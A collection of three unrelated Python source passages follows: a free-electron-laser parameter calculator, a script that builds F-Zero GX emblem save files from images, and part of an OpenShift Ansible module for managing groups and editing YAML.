rho1D = ((1.0 / 2.0 / gamma0)**3.0 * Ipk / self.currentA *
(au * JJ * lambdau / 2.0 / np.pi / sigmaBeam)**2)**(1.0 / 3.0)
Lg1D = lambdau / 4.0 / np.pi / np.sqrt(3) / rho1D
etad = Lg1D / (4.0 * np.pi * sigmaBeam**2.0 / lambdas)
etae = Lg1D / beta * 4.0 * np.pi * epsilonn / (gamma0 * lambdas)
etag = Lg1D / lambdau * 4.0 * np.pi * eta
capLambda = a1 * etad ** a2 \
+ a3 * etae ** a4 \
+ a5 * etag ** a6 \
+ a7 * etae ** a8 * etag ** a9 \
+ a10 * etad ** a11 * etag ** a12 \
+ a13 * etad ** a14 * etae ** a15 \
+ a16 * etad ** a17 * etae ** a18 * etag ** a19
Lg3D = Lg1D * (1.0 + capLambda)
rho3D = lambdau / 4.0 / np.pi / np.sqrt(3) / Lg3D
Psat = 1.6 * rho1D * (
Lg1D / Lg3D)**2.0 * gamma0 * 0.511 * Ipk * 1.0e6 # W
# update and return calculated parameters
self.au = au
if self.undulatorType == 'planar':
self.K = au * np.sqrt(2.0)
self.Bu = self.K / 0.934 / (100 * lambdau)
else: # helical
self.K = au
self.Bu = self.K / 0.934 / (100 * lambdau)
self.gu = HalbachPerm(
_lambdau=lambdau * 1000, _Bu=self.Bu).findGap(gap0=5)
self.sigmar = sigmaBeam
self.rho1D = rho1D
self.rho3D = rho3D
self.Lg1D = Lg1D
self.Lg3D = Lg3D
self.Psat = Psat
Nlambda = Ipk * lambdas / self.e0 / self.c0
Pshot = 3.0 * np.sqrt(
4.0 * np.pi
) * rho1D**2.0 * self.beamEnergy * Ipk / Nlambda / np.sqrt(
np.log(Nlambda / rho1D)) * 1e6
Lsat = Lg3D * self.findSatFactor(Nlambda, Lg3D, lambdau)
Pss = 1.0 / 9.0 * Pshot * np.exp(Lsat / Lg3D)
sigmat = self.bunchCharge / Ipk / self.bunchratio # bunch length (rms) for gaussian, full lenth for rectangle
bandwidth = np.sqrt(3.0 * np.sqrt(3.0) * rho3D * lambdau / lu)
# Pexit = 1.0/9.0*Pshot*np.exp(Lsat/Lg3D)
pulseEnergy = self.bunchratio * sigmat * Pss # J
photonEnergy = self.h0 * self.c0 / self.e0 / lambdas # eV
Np = pulseEnergy / photonEnergy / self.e0 # photon per pulse
return {
"01-au": self.au,
"02-K": self.K,
"03-Bu": self.Bu,
"04-gap": self.gu,
"05-rho1D": rho1D,
"06-rho3D": rho3D,
"07-Lg1D": Lg1D,
"08-Lg3D": Lg3D,
"09-Psat": Psat,
"10-Pshot": Pshot,
"11-Pss": Pss,
"12-Lsat": Lsat,
"13-sigmar": sigmaBeam * 1e6,
"14-sigmat": sigmat * 1e15,
"15-bandWidth": bandwidth * 100,
"16-PhotonEnergy": photonEnergy,
"17-PulseEnergy": pulseEnergy * 1e6,
"18-PhotonPerPulse": Np,
}
def findSatFactor(self, nl, l3, xlamd, factor0=20):
""" Calculator saturation length in the unit of 3D power gainlength
:param factor0: initial saturation factor, saturation length over power gain length
:param nl: electron count within one unit of FEL wavelength
:param l3: power gain length (3D)
:param xlamd: undulator period
"""
fx = lambda x: 6.0 * np.sqrt(3.0 * np.pi) * nl * l3 * np.sqrt(x) - xlamd * np.exp(x)
return fsolve(fx, x0=factor0 * np.ones(np.size(self.Lg3D)))
def test1():
inst = FELcalc(17500, 8.5714e-5, 0.08, 15, 1.3e-9, 1.4e-6, 5000, 1.0e-9,
100)
for (key, val) in inst.onFELAnalyse().items():
print(key, '\t=\t', val)
def test2():
energy = np.linspace(17000, 18000, 3)
inst = FELcalc(energy, 8.5714e-5, 0.08, 15, 1.3e-9, 1.4e-6, 5000, 1.0e-9,
100)
result = inst.onFELAnalyse()
print(result['ppp'])
def test3():
bunchCharge = np.linspace(0.5e-9, 1e-9, 3)
inst = FELcalc(17500, 8.5714e-5, 0.08, 15, 1.3e-9, 1.4e-6, 5000,
bunchCharge, 100)
result = inst.onFELAnalyse()
print(result['sigmat'])
if __name__ == '__main__':
test3()
|
|
# Requirements:
# - Python version late enough to support argparse (2.7+ or 3.2+)
# - Pillow 2.7+
# - Windows note: may need to install using easy_install instead of pip
# - Linux note: may need to install the libraries for any image
# format(s) you'll use, such as libpng and zlib for PNG
import datetime
import math
import os
import struct
from PIL import Image
YEAR_2000 = datetime.datetime(2000, 1, 1)
# Find this script's directory, then navigate from there to the common
# directory, which has some files we need to read.
# This way of specifying the directory is better than '../common' since the
# script's directory doesn't have to be the current working directory.
# http://stackoverflow.com/a/9350788/
script_dir = os.path.dirname(os.path.realpath(__file__))
common_dir = os.path.join(script_dir, os.pardir, 'common')
def short_filename(filename, seconds_since_start_of_2000):
if not filename:
return "fze0200002000{:14X}.dat".format(int(seconds_since_start_of_2000 * 40500000))
return "fze1-" + filename + ".dat"
def full_filename(filename):
return "8P-GFZE-" + filename + ".gci"
def checksum(post_checksum_bytes):
checksum = 0xFFFF
generator_polynomial = 0x8408
for byte_as_number in post_checksum_bytes:
checksum = checksum ^ byte_as_number
for i in xrange(8):
if checksum & 1 == 1:
checksum = (checksum >> 1) ^ generator_polynomial
else:
checksum = checksum >> 1
# Flip all the bits
checksum = checksum ^ 0xFFFF
return bytearray(struct.pack(">H", checksum))
def setup_header_bytes(emblem_short_filename, seconds_since_start_of_2000):
header_bytes = bytearray()
# Constant bytes
header_bytes += bytearray("GFZE8P")
header_bytes += bytearray([0xFF, 2])
# Short filename followed by 0 padding until 32 bytes
header_bytes += bytearray(emblem_short_filename)
header_bytes += bytearray(32 - len(emblem_short_filename))
# Timestamp
header_bytes += bytearray(
struct.pack(">I", int(seconds_since_start_of_2000)))
# Constant bytes
header_bytes += bytearray([0, 0, 0, 0x60, 0, 2, 0, 3, 4])
# Copy count (1 byte)
header_bytes += bytearray([0])
# Start block (2 bytes)
#
# TODO: Check if there is a better value to use here besides 0.
# Want to avoid the following error when we try to delete the file from a
# memcard in Dolphin: "Order of files in the File Directory do not match
# the block order[.] Right click and export all of the saves, and import
# the saves to a new memcard"
header_bytes += bytearray(struct.pack(">H", 0))
# Constant bytes
header_bytes += bytearray([0, 3, 0xFF, 0xFF, 0, 0, 0, 4])
return header_bytes
def setup_more_info_bytes(now, additional_comment):
more_info_bytes = bytearray()
# Constant bytes
more_info_bytes += bytearray([4, 1])
# Game title followed by 0 padding until 32 bytes
more_info_bytes += bytearray("F-ZERO GX")
more_info_bytes += bytearray(32 - len("F-ZERO GX"))
# File comment followed by 0 padding until 60 bytes
comment_str = now.strftime("%y/%m/%d %H:%M")
if additional_comment:
comment_str += " (Created using third party code)"
more_info_bytes += bytearray(comment_str)
more_info_bytes += bytearray(60 - len(comment_str))
return more_info_bytes
def crop_square(img):
"""Crop to a square.
img.size gives a tuple of (width, height).
Left is inclusive, right is not inclusive; same for upper and lower.
"""
width, height = img.size
min_dimension = min(width, height)
crop_left = width - min_dimension
crop_right = crop_left + min_dimension
crop_upper = height - min_dimension
crop_lower = crop_upper + min_dimension
img = img.crop((crop_left, crop_upper, crop_right, crop_lower))
def emblem(img64_data, alpha_threshold):
"""Emblem (64x64)
# Go through the pixels in 4x4 blocks, left to right and top to
# bottom. This is the order that the emblem data must be stored in.
"""
emblem_pixel_bytes = bytearray()
for block_row in xrange(16):
for block_col in xrange(16):
for pixel_row in xrange(4):
# Get the corresponding pixels in the 64x64 emblem, which just
# goes row by row.
first_i = block_row*64*4 + pixel_row*64 + block_col*4
pixel_data = [img64_data[i] for i in range(first_i, first_i+4)]
for rgba in pixel_data:
if rgba[3] >= alpha_threshold:
red = int(math.floor(rgba[0] / 8.0))
green = int(math.floor(rgba[1] / 8.0))
blue = int(math.floor(rgba[2] / 8.0))
alpha = 1
value = 32768*alpha + 1024*red + 32*green + blue
else:
value = 0
emblem_pixel_bytes += bytearray(struct.pack(">H", value))
return emblem_pixel_bytes
def banner(img32, alpha_threshold):
"""Banner (96x32)
emblem_banner_base is a pre-existing file that contains the left 2/3rds
of an F-Zero GX emblem file's banner, in the same pixel format as any
emblem file. (The left 2/3rds of the banner are the same for
every emblem.)
"""
banner_base_file = open(
os.path.join(common_dir, 'emblem_banner_base'), 'rb')
banner_bytes = bytearray()
img32_data = img32.getdata()
# We now have the banner with blank pixels in the emblem preview. Now
# we'll fill in that emblem preview.
for block_row in xrange(8):
banner_bytes += banner_base_file.read(0x200)
for block_col in xrange(8):
for pixel_row in xrange(4):
# Get the corresponding pixels in the 32x32 emblem version.
first_i = block_row*32*4 + pixel_row*32 + block_col*4
pixel_data = [img32_data[i] for i in range(first_i, first_i+4)]
for rgba in pixel_data:
if rgba[3] >= alpha_threshold:
red = int(math.floor(rgba[0] / 8.0))
green = int(math.floor(rgba[1] / 8.0))
blue = int(math.floor(rgba[2] / 8.0))
alpha = 1
value = 32768*alpha + 1024*red + 32*green + blue
else:
value = 0
banner_bytes += bytearray(struct.pack(">H", value))
return banner_bytes
def icon():
"""Icon (32x32)
emblem_icon is a pre-existing file that contains an F-Zero GX
emblem file's icon, in the same pixel format as any emblem file.
(The icon is the same for every emblem.)
"""
return open(os.path.join(common_dir, 'emblem_icon'), 'rb').read()
def edge_options(img, edge_option):
# Image.LANCZOS constant requires Pillow 2.7 or higher.
if edge_option == 'resize62':
# Resize to 62x62, then paste into the middle of an empty 64x64 image.
img62 = img.resize((62,62), Image.LANCZOS)
img64 = Image.new("RGBA", (64,64), (0,0,0,0))
img64.paste(img62, box=(1,1))
elif edge_option == 'crop':
# Resize to 64x64 and replace the edges with empty pixels.
img64 = img.resize((64,64), Image.LANCZOS)
for i in xrange(64):
img64.putpixel((0,i), (0,0,0,0))
img64.putpixel((63,i), (0,0,0,0))
img64.putpixel((i,0), (0,0,0,0))
img64.putpixel((i,63), (0,0,0,0))
elif edge_option == 'resize64':
# Resize to 64x64.
img64 = img.resize((64,64), Image.LANCZOS)
return img64;
def seconds_since_2000(now):
return (now - YEAR_2000).total_seconds()
def image(image_filename):
img = Image.open(image_filename).convert(mode="RGBA")
crop_square(img)
return img
def emblem_maker(args):
now = datetime.datetime.now()
seconds_since_start_of_2000 = seconds_since_2000(now)
alpha_threshold = args.alpha_threshold
icon_bytes = icon()
emblem_short_filename = short_filename(args.emblem_filename, seconds_since_start_of_2000)
emblem_full_filename = full_filename(emblem_short_filename)
header_bytes = setup_header_bytes(emblem_short_filename, seconds_since_start_of_2000)
more_info_bytes = setup_more_info_bytes(now, args.additional_comment)
img = image(args.image_filename)
# TODO: Test non-RGBA stuff going through crop or resize64.
# (That, or know when to tell the user to resize/convert themselves...)
img64 = edge_options(img, args.edge_option)
# TODO: Check how the 64 to 32 resize is done by the game. Not a
# big deal though, it just means the banner may look slightly different
# than it should in a memcard manager.
img32 = img.resize((32,32), Image.LANCZOS)
img64_data = img64.getdata()
emblem_pixel_bytes = emblem(img64_data, alpha_threshold)
banner_bytes = banner(img32, alpha_threshold)
# A bunch of zeros until the end of 3 Gamecube memory blocks
end_padding_bytes = bytearray(0x6040 - 0x40A0)
post_checksum_bytes = more_info_bytes + banner_bytes \
+ icon_bytes + emblem_pixel_bytes + end_padding_bytes
checksum_bytes = checksum(post_checksum_bytes)
emblem_file = open(emblem_full_filename, 'wb')
emblem_file.write(header_bytes + checksum_bytes + post_checksum_bytes)
emblem_file.close()
|
|
#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/group -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_group
short_description: Modify, and idempotently manage openshift groups.
description:
- Modify openshift groups programmatically.
options:
state:
description:
- Supported states, present, absent, list
- present - will ensure object is created or updated to the value specified
- list - will return a group
- absent - will remove the group
required: False
default: present
choices: ["present", 'absent', 'list']
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: str
aliases: []
author:
- "Joel Diaz <jdiaz@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: create group
oc_group:
state: present
name: acme_org
register: group_out
'''
# -*- -*- -*- End included fragment: doc/group -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
@staticmethod
def remove_entry(data, key, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
data.clear()
return True
elif key == '' and isinstance(data, list):
del data[:]
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
raise YeditException("Unexpected item type found while going through key " +
"path: {} (at key: {})".format(key, dict_key))
data[dict_key] = {}
data = data[dict_key]
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
raise YeditException("Unexpected item type found while going through key path: {}".format(key))
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
# didn't add/update to an existing list, nor add/update key to a dict
# so we must have been provided some syntax like a.b.c[<int>] = "data" for a
# non-existent array
else:
raise YeditException("Error adding to object at path: {}".format(key))
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
yfd.write(contents)
os.rename(tmp_filename, filename)
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, self.filename + '.orig')
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripDumper if supported.
try:
Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except AttributeError:
Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripLoader if supported.
try:
self.yaml_dict = yaml.safe_load(contents, yaml.RoundTripLoader)
except AttributeError:
self.yaml_dict = yaml.safe_load(contents)
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. {}'.format(err))
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# AUDIT:maybe-no-member makes sense due to loading data from
# a serialized format.
# pylint: disable=maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
'value=[{}] type=[{}]'.format(value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index is not None:
ind = index
if ind is not None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
# already exists, return
if ind is not None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is None:
return (False, self.yaml_dict)
# When path equals "" it is a special case.
# "" refers to the root of the document
# Only update the root path (entire document) when its a list or dict
if path == '':
if isinstance(result, list) or isinstance(result, dict):
self.yaml_dict = result
return (True, self.yaml_dict)
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is not None:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
'''return the current value'''
if invalue is None:
return None
curr_value = invalue
if val_type == 'yaml':
curr_value = yaml.load(invalue)
elif val_type == 'json':
curr_value = json.loads(invalue)
return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
'''determine value type passed'''
true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
'on', 'On', 'ON', ]
false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
'off', 'Off', 'OFF']
# It came in as a string but you didn't specify value_type as string
# we will convert to bool if it matches any of the above cases
if isinstance(inc_value, str) and 'bool' in vtype:
if inc_value not in true_bools and inc_value not in false_bools:
raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
elif isinstance(inc_value, bool) and 'str' in vtype:
inc_value = str(inc_value)
# There is a special case where '' will turn into None after yaml loading it so skip
if isinstance(inc_value, str) and inc_value == '':
pass
# If vtype is not str then go ahead and attempt to yaml load it.
elif isinstance(inc_value, str) and 'str' not in vtype:
try:
inc_value = yaml.safe_load(inc_value)
except Exception:
raise YeditException('Could not determine type of incoming value. ' +
'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))
return inc_value
@staticmethod
def process_edits(edits, yamlfile):
'''run through a list of edits and process them one-by-one'''
results = []
for edit in edits:
value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
if edit.get('action') == 'update':
# pylint: disable=line-too-long
curr_value = Yedit.get_curr_value(
Yedit.parse_value(edit.get('curr_value')),
edit.get('curr_value_format'))
rval = yamlfile.update(edit['key'],
value,
edit.get('index'),
curr_value)
elif edit.get('action') == 'append':
rval = yamlfile.append(edit['key'], value)
else:
rval = yamlfile.put(edit['key'], value)
if rval[0]:
results.append({'key': edit['key'], 'edit': rval[1]})
return {'changed': len(results) > 0, 'results': results}
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params):
'''perform the idempotent crud operations'''
yamlfile = Yedit(filename=params['src'],
backup=params['backup'],
separator=params['separator'])
state = params['state']
if params['src']:
rval = yamlfile.load()
if yamlfile.yaml_dict is None and state != 'present':
return {'failed': True,
'msg': 'Error opening file [{}]. Verify that the '.format(params['src']) +
'file exists, that it is has correct permissions, and is valid yaml.'}
if state == 'list':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['key']:
rval = yamlfile.get(params['key']) or {}
return {'changed': False, 'result': rval, 'state': state}
elif state == 'absent':
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
yamlfile.yaml_dict = content
if params['update']:
rval = yamlfile.pop(params['key'], params['value'])
else:
rval = yamlfile.delete(params['key'])
if rval[0] and params['src']:
yamlfile.write()
return {'changed': rval[0], 'result': rval[1], 'state': state}
elif state == 'present':
# check if content is different than what is in the file
if params['content']:
content = Yedit.parse_value(params['content'], params['content_type'])
# We had no edits to make and the contents are the same
if yamlfile.yaml_dict == content and \
params['value'] is None:
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
yamlfile.yaml_dict = content
# If we were passed a key, value then
# we enapsulate it in a list and process it
# Key, Value passed to the module : Converted to Edits list #
edits = []
_edit = {}
if params['value'] is not None:
_edit['value'] = params['value']
_edit['value_type'] = params['value_type']
_edit['key'] = params['key']
if params['update']:
_edit['action'] = 'update'
_edit['curr_value'] = params['curr_value']
_edit['curr_value_format'] = params['curr_value_format']
_edit['index'] = params['index']
elif params['append']:
_edit['action'] = 'append'
edits.append(_edit)
elif params['edits'] is not None:
edits = params['edits']
if edits:
results = Yedit.process_edits(edits, yamlfile)
# if there were changes and a src provided to us we need to write
if results['changed'] and params['src']:
yamlfile.write()
return {'changed': results['changed'], 'result': results['results'], 'state': state}
# no edits to make
if params['src']:
# pylint: disable=redefined-variable-type
rval = yamlfile.write()
return {'changed': rval[0],
'result': rval[1],
'state': state}
# We were passed content but no src, key or value, or edits. Return contents in memory
return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
return {'failed': True, 'msg': 'Unkown state passed'}
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
''' Find and return oc binary file '''
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
self.all_namespaces = all_namespaces
self.oc_binary = locate_oc_binary()
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, res['results'][0], separator=sep)
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
